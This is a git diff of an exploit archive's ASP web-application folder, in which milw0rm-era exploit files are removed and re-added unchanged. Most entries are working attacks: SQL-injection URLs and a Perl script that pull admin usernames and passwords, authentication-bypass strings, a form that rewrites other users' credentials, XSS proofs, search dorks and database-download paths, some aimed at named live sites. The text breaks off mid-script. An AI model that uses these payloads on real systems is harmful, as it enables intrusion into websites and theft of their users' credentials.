
+

Kapda - Security Science Researchers Institute of Iran

+
+ + + +
+ +# milw0rm.com [2005-12-30] diff --git a/platforms/asp/webapps/2287.txt b/platforms/asp/webapps/2287.txt index 6c220cf3c..97e4cc732 100755 --- a/platforms/asp/webapps/2287.txt +++ b/platforms/asp/webapps/2287.txt @@ -1,19 +1,19 @@ -################################################################################ -## ## -## Icblogger <= "YID" Remote Blind SQL Injection ## -## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## -## Credit by | Chironex Fleckeri ## -## Mail | ChironeX.FleckeriX@Gmail.Com ## -## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## -## ## -################################################################################ - -########################################################################################################################################################################## -#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 # -########################################################################################################################################################################## - -############################################################# -#Admin Panel : http://www.target.com/path/admin/default.asp # -############################################################# - -# milw0rm.com [2006-09-01] +################################################################################ +## ## +## Icblogger <= "YID" Remote Blind SQL Injection ## +## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## +## Credit by | Chironex Fleckeri ## +## Mail | ChironeX.FleckeriX@Gmail.Com ## +## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## +## ## +################################################################################ + +########################################################################################################################################################################## +#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 # +########################################################################################################################################################################## + +############################################################# +#Admin Panel : http://www.target.com/path/admin/default.asp # +############################################################# + +# milw0rm.com [2006-09-01] diff --git a/platforms/asp/webapps/2371.txt b/platforms/asp/webapps/2371.txt index 04ed3e730..e1daab5e9 100755 --- a/platforms/asp/webapps/2371.txt +++ b/platforms/asp/webapps/2371.txt @@ -1,20 +1,20 @@ -+++++++++++++++++++++++++++++++++++++++++++++++++++ -+ Haberx v1.1 (tr) SQL Injection Vulnerability + -+ Author : Fix TR + -+ Site : www.hack.gen.tr + -+ Contact : fixtr[at]bsdmail.com + -+++++++++++++++++++++++++++++++++++++++++++++++++++ - -+ Download: http://www.aspindir.com/Goster/3983 -+ Versions: 1.02 between 1.1 -+ Bug In : kategorix.asp -+ Risk : High - - -+ Admin Nick: -http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 - -+ Admin Password: (Big Letters) -http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 - -# milw0rm.com [2006-09-15] ++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ Haberx v1.1 (tr) SQL Injection Vulnerability + ++ Author : Fix TR + ++ Site : www.hack.gen.tr + ++ Contact : fixtr[at]bsdmail.com + ++++++++++++++++++++++++++++++++++++++++++++++++++++ + ++ Download: http://www.aspindir.com/Goster/3983 ++ Versions: 1.02 between 1.1 ++ Bug In : kategorix.asp ++ Risk : High + + ++ Admin Nick: +http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 + ++ Admin Password: (Big Letters) +http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 + +# milw0rm.com [2006-09-15] diff --git a/platforms/asp/webapps/2387.txt b/platforms/asp/webapps/2387.txt index 50f7babb5..7b543b46a 100755 --- a/platforms/asp/webapps/2387.txt +++ b/platforms/asp/webapps/2387.txt @@ -1,41 +1,41 @@ -Vulnerability Report -******************************************************************************* -# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability - -# Author : ajann - -# Script Page : http://www.charon.co.uk - -# Exploit; - -******************************************************************************* - -###http://[target]/[path]/Review.asp?ProductID=[SQL HERE] - -Example: - -//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201 -//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201 -Email and Password ==> login.asp [L0gin P4Ge] - -Columns; -""""""""""""""""""""" -CustomerID -""""""""""""""""""""" -CustomerEmail -""""""""""""""""""""" -CustomerPassword -""""""""""""""""""""" -ShipCountry -""""""""""""""""""""" -Phone -""""""""""""""""""""" -......... -""""""""""""""""""""" -.... -""""""""""""""""""""" -# ajann,Turkey -# ... -# Im not Hacker! - -# milw0rm.com [2006-09-17] +Vulnerability Report +******************************************************************************* +# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability + +# Author : ajann + +# Script Page : http://www.charon.co.uk + +# Exploit; + +******************************************************************************* + +###http://[target]/[path]/Review.asp?ProductID=[SQL HERE] + +Example: + +//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201 +//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201 +Email and Password ==> login.asp [L0gin P4Ge] + +Columns; +""""""""""""""""""""" +CustomerID +""""""""""""""""""""" +CustomerEmail +""""""""""""""""""""" +CustomerPassword +""""""""""""""""""""" +ShipCountry +""""""""""""""""""""" +Phone +""""""""""""""""""""" +......... +""""""""""""""""""""" +.... +""""""""""""""""""""" +# ajann,Turkey +# ... +# Im not Hacker! + +# milw0rm.com [2006-09-17] diff --git a/platforms/asp/webapps/2773.txt b/platforms/asp/webapps/2773.txt index e6b1abba4..a88c7b048 100755 --- a/platforms/asp/webapps/2773.txt +++ b/platforms/asp/webapps/2773.txt @@ -1,19 +1,19 @@ -******************************************************************************* -# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability -# Author : ajann - -******************************************************************************* -Example: - -###http://[target]/[path]/admin/ - -UserName: ' union select 0,0 from admin - - -""""""""""""""""""""" -# ajann,Turkey -# ... - -# Im not Hacker! - -# milw0rm.com [2006-11-13] +******************************************************************************* +# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability +# Author : ajann + +******************************************************************************* +Example: + +###http://[target]/[path]/admin/ + +UserName: ' union select 0,0 from admin + + +""""""""""""""""""""" +# ajann,Turkey +# ... + +# Im not Hacker! + +# milw0rm.com [2006-11-13] diff --git a/platforms/asp/webapps/30048.html b/platforms/asp/webapps/30048.html new file mode 100755 index 000000000..550c7899a --- /dev/null +++ b/platforms/asp/webapps/30048.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24033/info + +VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected. + + VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability


VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability
discovered by John Martinelli of RedLevel Security

Google d0rk: intitle:"VP-ASP Shopping Cart 6.50"


file shopcontent.asp - variable type - method get




\ No newline at end of file diff --git a/platforms/asp/webapps/30077.txt b/platforms/asp/webapps/30077.txt new file mode 100755 index 000000000..7ab7bc5af --- /dev/null +++ b/platforms/asp/webapps/30077.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24119/info + +Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. + +Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected. + +https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/3048.pl b/platforms/asp/webapps/3048.pl index f5e3c053d..c2a7e5b92 100755 --- a/platforms/asp/webapps/3048.pl +++ b/platforms/asp/webapps/3048.pl @@ -1,103 +1,103 @@ -#!/usr/bin/perl -#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit -#[Coded by : ajann -#[Author : ajann -#[Contact : :( -#[S.Page : http://www.websitedesignsforless.com -#[$$ : $9.95 -#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. -#[.. : ajann,Turkey - -# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201 - - -use IO::Socket; -if(@ARGV < 1){ -print " -[======================================================================== -[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit -[// Usage: exploit.pl [target] -[// Example: exploit.pl victim.com -[// Example: exploit.pl victim.com -[// Vuln&Exp : ajann -[======================================================================== -"; -exit(); -} -#Local variables -$server = $ARGV[0]; -$server =~ s/(http:\/\/)//eg; -$host = "http://".$server; -$port = "80"; -$file = "/coupon_detail.asp?key="; - -print "Script : "; -$dir = ; -chop ($dir); - -if ($dir =~ /exit/){ -print "-- Exploit Failed[You Are Exited] \n"; -exit(); -} - -if ($dir =~ /\//){} -else { -print "-- Exploit Failed[No DIR] \n"; -exit(); - } - -print "User : "; -$ID = ; -chop ($ID); - -if ($ID =~ /exit/){ -print "-- Exploit Failed[You Are Exited] \n"; -exit(); -} - -$len=length($ID); - -if ($len == 1){} -else { -print "-- Exploit Failed[No User Id] \n"; -exit(); - } - -$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; -$target = $host.$dir.$file.$target; - -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $server\n"; -$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $socket "GET $target HTTP/1.1\n"; -print $socket "Host: $server\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; -print "+ Connected!...\n"; -#Getting -while($answer = <$socket>) { -if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){ -print "+ Exploit succeed! Getting admin information.\n"; -print "+ ---------------- +\n"; -print "+ Username: $1\n"; -} - -if ($answer =~ /(.*?)
/){ -print "+ Password: $1\n"; -} - -if ($answer =~ /Syntax error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - -if ($answer =~ /Internal Server Error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - } - -# milw0rm.com [2006-12-30] +#!/usr/bin/perl +#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit +#[Coded by : ajann +#[Author : ajann +#[Contact : :( +#[S.Page : http://www.websitedesignsforless.com +#[$$ : $9.95 +#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. +#[.. : ajann,Turkey + +# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201 + + +use IO::Socket; +if(@ARGV < 1){ +print " +[======================================================================== +[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit +[// Usage: exploit.pl [target] +[// Example: exploit.pl victim.com +[// Example: exploit.pl victim.com +[// Vuln&Exp : ajann +[======================================================================== +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$host = "http://".$server; +$port = "80"; +$file = "/coupon_detail.asp?key="; + +print "Script : "; +$dir = ; +chop ($dir); + +if ($dir =~ /exit/){ +print "-- Exploit Failed[You Are Exited] \n"; +exit(); +} + +if ($dir =~ /\//){} +else { +print "-- Exploit Failed[No DIR] \n"; +exit(); + } + +print "User : "; +$ID = ; +chop ($ID); + +if ($ID =~ /exit/){ +print "-- Exploit Failed[You Are Exited] \n"; +exit(); +} + +$len=length($ID); + +if ($len == 1){} +else { +print "-- Exploit Failed[No User Id] \n"; +exit(); + } + +$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; +$target = $host.$dir.$file.$target; + +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $server\n"; +$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $socket "GET $target HTTP/1.1\n"; +print $socket "Host: $server\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; +#Getting +while($answer = <$socket>) { +if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){ +print "+ Exploit succeed! Getting admin information.\n"; +print "+ ---------------- +\n"; +print "+ Username: $1\n"; +} + +if ($answer =~ /(.*?)
/){ +print "+ Password: $1\n"; +} + +if ($answer =~ /Syntax error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + +if ($answer =~ /Internal Server Error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + } + +# milw0rm.com [2006-12-30] diff --git a/platforms/asp/webapps/3187.txt b/platforms/asp/webapps/3187.txt index 11856986a..6a25780bb 100755 --- a/platforms/asp/webapps/3187.txt +++ b/platforms/asp/webapps/3187.txt @@ -1,25 +1,25 @@ -******************************************************************************* -# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability -# Author : ajann -# Contact : :( -# S.Page : http://www.planetgraphic.de/ - -******************************************************************************* - -[[SQL]]]--------------------------------------------------------- - -http://[target]/[path]//news_detail.asp?id=[SQL] - -Example: - -//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers - -[[/SQL]] - -""""""""""""""""""""" -# ajann,Turkey -# ... - -# Im not Hacker! - -# milw0rm.com [2007-01-24] +******************************************************************************* +# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability +# Author : ajann +# Contact : :( +# S.Page : http://www.planetgraphic.de/ + +******************************************************************************* + +[[SQL]]]--------------------------------------------------------- + +http://[target]/[path]//news_detail.asp?id=[SQL] + +Example: + +//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers + +[[/SQL]] + +""""""""""""""""""""" +# ajann,Turkey +# ... + +# Im not Hacker! + +# milw0rm.com [2007-01-24] diff --git a/platforms/asp/webapps/3194.txt b/platforms/asp/webapps/3194.txt index e83404827..8d3de9026 100755 --- a/platforms/asp/webapps/3194.txt +++ b/platforms/asp/webapps/3194.txt @@ -1,26 +1,26 @@ -******************************************************************************* -# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability -# Author : ajann -# Contact : :( -# S.Page : http://www.makit.net -# $$ : Free - -******************************************************************************* - -[[SQL]]]--------------------------------------------------------- - -http://[target]/[path]//news_page.asp?uid=[SQL] - -Example: - -//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1 - -[[/SQL]] - -""""""""""""""""""""" -# ajann,Turkey -# ... - -# Im not Hacker! - -# milw0rm.com [2007-01-25] +******************************************************************************* +# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability +# Author : ajann +# Contact : :( +# S.Page : http://www.makit.net +# $$ : Free + +******************************************************************************* + +[[SQL]]]--------------------------------------------------------- + +http://[target]/[path]//news_page.asp?uid=[SQL] + +Example: + +//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1 + +[[/SQL]] + +""""""""""""""""""""" +# ajann,Turkey +# ... + +# Im not Hacker! + +# milw0rm.com [2007-01-25] diff --git a/platforms/asp/webapps/3321.txt b/platforms/asp/webapps/3321.txt index 6d17034c4..a3d3b0a98 100755 --- a/platforms/asp/webapps/3321.txt +++ b/platforms/asp/webapps/3321.txt @@ -1,30 +1,30 @@ -=================================X=O=R=O=N================================= - -Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability - -=================================X=O=R=O=N================================= - -Bulan: xoron - -xoron.info - xoron.biz - -=================================X=O=R=O=N================================= - -POC: pop_profile.asp?mode=display&id=[SQL-INJ] - -=================================X=O=R=O=N================================= - -Username: -pop_profile.asp?mode=display&id=1 - -Pass: -pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS - -=================================X=O=R=O=N================================= - -Thanx: str0ke, kacper, shika -Tesekkurler: pang0, chaos, can bjorn, DJR - -=================================X=O=R=O=N================================= - -# milw0rm.com [2007-02-16] +=================================X=O=R=O=N================================= + +Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability + +=================================X=O=R=O=N================================= + +Bulan: xoron + +xoron.info - xoron.biz + +=================================X=O=R=O=N================================= + +POC: pop_profile.asp?mode=display&id=[SQL-INJ] + +=================================X=O=R=O=N================================= + +Username: +pop_profile.asp?mode=display&id=1 + +Pass: +pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS + +=================================X=O=R=O=N================================= + +Thanx: str0ke, kacper, shika +Tesekkurler: pang0, chaos, can bjorn, DJR + +=================================X=O=R=O=N================================= + +# milw0rm.com [2007-02-16] diff --git a/platforms/asp/webapps/7273.txt b/platforms/asp/webapps/7273.txt index 71b509ef3..e3f82244d 100755 --- a/platforms/asp/webapps/7273.txt +++ b/platforms/asp/webapps/7273.txt @@ -1,44 +1,44 @@ -[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ - [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability - - [~]Vendor:www.activewebsoftwares.com - - [~]Software: Active Force Matrix v 2 - - [~]author: ((Ñ3d D3v!L)) - - [~] Date: 28.11.2008 - - [~] Home: www.ahacker.biz - - [~] contact: N/A - -[~] ----------------------------------------------------------- - - - [~] Exploit: - - username: r0' or ' 1=1-- - password: r0' or ' 1=1-- - - - [~]login 4 d3m0: - - http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp - - - -[~]-------------------------------------------------------------------------------- - - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهÙر٠- [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} - [~] - [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller - [~] - [~] xp10.biz & ahacker.biz - [~] - -[~]-------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-29] +[~] ----------------------------بسم الله الرحمن الرحÙÙ…------------------------------ + [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability + + [~]Vendor:www.activewebsoftwares.com + + [~]Software: Active Force Matrix v 2 + + [~]author: ((Ñ3d D3v!L)) + + [~] Date: 28.11.2008 + + [~] Home: www.ahacker.biz + + [~] contact: N/A + +[~] ----------------------------------------------------------- + + + [~] Exploit: + + username: r0' or ' 1=1-- + password: r0' or ' 1=1-- + + + [~]login 4 d3m0: + + http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp + + + +[~]-------------------------------------------------------------------------------- + + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهÙر٠+ [~] + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] + [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller + [~] + [~] xp10.biz & ahacker.biz + [~] + +[~]-------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-29] diff --git a/platforms/asp/webapps/7445.txt b/platforms/asp/webapps/7445.txt index bfb14e817..45c722842 100755 --- a/platforms/asp/webapps/7445.txt +++ b/platforms/asp/webapps/7445.txt @@ -1,15 +1,15 @@ -######################################################### ---------------------------------------------------------- -Portal Name: Discussion Web -Version : 4.0 -Vendor : http://www.takempis.com/aboutdiscussion.htm -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Vulnerability : (DD) ---------------------------------------------------------- -######################################################### -[DD]: -http://site.com/[Path]/_private/discussion.mdb - ---------------------------------- - -# milw0rm.com [2008-12-14] +######################################################### +--------------------------------------------------------- +Portal Name: Discussion Web +Version : 4.0 +Vendor : http://www.takempis.com/aboutdiscussion.htm +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Vulnerability : (DD) +--------------------------------------------------------- +######################################################### +[DD]: +http://site.com/[Path]/_private/discussion.mdb + +--------------------------------- + +# milw0rm.com [2008-12-14] diff --git a/platforms/asp/webapps/7464.txt b/platforms/asp/webapps/7464.txt index f950e24b3..b780b045e 100755 --- a/platforms/asp/webapps/7464.txt +++ b/platforms/asp/webapps/7464.txt @@ -1,30 +1,30 @@ -########################################################################### -#-------------------------------AlpHaNiX----------------------------------# -########################################################################### - -#Found By : AlpHaNiX -#website : www.offensivetrack.org -#contact : AlpHa[AT]HACKER[DOT]BZ - -########################################################################### - -#script : RealtyListing V1/V2 -#download : null -#Demo : http://www.aspsiteware.com/Realty1 - http://www.aspsiteware.com/realty2/realty2/ - - -########################################################################### - -#Exploits : - ---=[SQL INJECTION]=-- -http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# -http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# -http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users -http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users - - -########################################################################### - -# milw0rm.com [2008-12-14] +########################################################################### +#-------------------------------AlpHaNiX----------------------------------# +########################################################################### + +#Found By : AlpHaNiX +#website : www.offensivetrack.org +#contact : AlpHa[AT]HACKER[DOT]BZ + +########################################################################### + +#script : RealtyListing V1/V2 +#download : null +#Demo : http://www.aspsiteware.com/Realty1 + http://www.aspsiteware.com/realty2/realty2/ + + +########################################################################### + +#Exploits : + +--=[SQL INJECTION]=-- +http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# +http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# +http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users +http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users + + +########################################################################### + +# milw0rm.com [2008-12-14] diff --git a/platforms/asp/webapps/7736.htm b/platforms/asp/webapps/7736.htm index 4b5e8e6bc..ae8f4e755 100755 --- a/platforms/asp/webapps/7736.htm +++ b/platforms/asp/webapps/7736.htm @@ -1,127 +1,127 @@ -******************************************************************************* -# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit -# Author : "ajann" from Turkey -# Contact : :( -# S.Page : http://www.comersus.com/ -# $$ : Free -# Dork : Powered by Comersus v6 Shopping Cart -# DorkEx : - -http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta= - -KAHROLSUN ISRAEL - --Register Site --Login --Open Exploit --Edit: User Email , User Password --Submit Form - -******************************************************************************* - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Name - -
Last Name - -
Company - -
Phone - -
Email - - - Edit -
Password - - Edit -
Address - -
Zip - -
State - - -
Non listed state - -
City - -
Country - - -
  
- -
-
- -# milw0rm.com [2009-01-12] +******************************************************************************* +# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit +# Author : "ajann" from Turkey +# Contact : :( +# S.Page : http://www.comersus.com/ +# $$ : Free +# Dork : Powered by Comersus v6 Shopping Cart +# DorkEx : + +http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta= + +KAHROLSUN ISRAEL + +-Register Site +-Login +-Open Exploit +-Edit: User Email , User Password +-Submit Form + +******************************************************************************* + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Name + +
Last Name + +
Company + +
Phone + +
Email + + + Edit +
Password + + Edit +
Address + +
Zip + +
State + + +
Non listed state + +
City + +
Country + + +
  
+ +
+
+ +# milw0rm.com [2009-01-12] diff --git a/platforms/asp/webapps/8120.txt b/platforms/asp/webapps/8120.txt index 2ff50378c..ba56faae8 100755 --- a/platforms/asp/webapps/8120.txt +++ b/platforms/asp/webapps/8120.txt @@ -1,44 +1,44 @@ -@~~=======================================~~@ -====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== -@~~=======================================~~@ -@~~=Author : ByALBAYX - -@~~=Website : WWW.C4TEAM.ORG - -@~~=From : Turkish -@~~=======================================~~@ -@~~=Script :SkyPortal Downloads Manager v1.1 - -@~~=S.Site :http://skyportal.net - -@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip - -@~~=Demo :http://vegtrafikk.net -@~~=======================================~~@ - -@~~=Vul: - -@~~=http://site.com/ [PATH] /admin_dl_browse.asp - -@~~=http://site.com/ [PATH] /dl_add_form.asp - - -@~~=Demo: - -@~~=http://vegtrafikk.net/admin_dl_browse.asp - -@~~=http://resala2u.com/admin_dl_browse.asp - - -vs.. vs.. vs.. -@~~=======================================~~@ -@~~=Greetz For - -@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang -@~~=======================================~~@ -Derdimi dinledim, derdimden iGRENDiM... -Onun derdini gordum, derdime iMRENDiM... -FilistiN -@~~=======================================~~@ - -# milw0rm.com [2009-02-27] +@~~=======================================~~@ +====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== +@~~=======================================~~@ +@~~=Author : ByALBAYX + +@~~=Website : WWW.C4TEAM.ORG + +@~~=From : Turkish +@~~=======================================~~@ +@~~=Script :SkyPortal Downloads Manager v1.1 + +@~~=S.Site :http://skyportal.net + +@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip + +@~~=Demo :http://vegtrafikk.net +@~~=======================================~~@ + +@~~=Vul: + +@~~=http://site.com/ [PATH] /admin_dl_browse.asp + +@~~=http://site.com/ [PATH] /dl_add_form.asp + + +@~~=Demo: + +@~~=http://vegtrafikk.net/admin_dl_browse.asp + +@~~=http://resala2u.com/admin_dl_browse.asp + + +vs.. vs.. vs.. +@~~=======================================~~@ +@~~=Greetz For + +@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang +@~~=======================================~~@ +Derdimi dinledim, derdimden iGRENDiM... +Onun derdini gordum, derdime iMRENDiM... +FilistiN +@~~=======================================~~@ + +# milw0rm.com [2009-02-27] diff --git a/platforms/asp/webapps/8377.pl b/platforms/asp/webapps/8377.pl index c8a1e7062..c8512a7af 100755 --- a/platforms/asp/webapps/8377.pl +++ b/platforms/asp/webapps/8377.pl @@ -1,56 +1,56 @@ -#!/usr/bin/perl -# By AlpHaNiX [NullArea.Net] -# alpha[at]hacker.bz -# Made in Tunisia -########### -# script : Exjune Guestbook v2 -# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp -########### -# Vulnerable : -# database path : /admin/exdb.mdb -########## -# Real Life Example : -# -# -# OOO OOO OO OO OO -# OO O O O O -# O O O OO OO O O O O OO OOO OOOO OOOOO -# O O O O O O O OOO OO OOOOOO O -# O OO O O O O O O O O OOOOOO -# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO -# -# -#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit -#[-] Found & Exploited By AlpHaNiX -# -# -#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// .... -#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb -########## -# Greetz for Zigma/Djek/unary/r1z - - -use lwp::UserAgent; - -system('cls'); -system('title Exjune Guestbook v2 Remote Database Disclosure Exploit'); -system('color 2'); -if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();} -if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } -print "\n\n\n\n OOO OOO OO OO OO\n" ; -print " OO O O O O\n" ; -print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ; -print " O O O O O O O OOO OO OOOOOO O\n" ; -print " O OO O O O O O O O O OOOOOO\n" ; -print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ; -print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n"; -print "[-] Found & Exploited By AlpHaNiX \n\n\n"; -print "[!] Exploiting $site ....\n"; -my $site = $ARGV[0] ; -my $target = $site."/admin/exdb.mdb" ; -my $useragent = LWP::UserAgent->new(); -my $request = 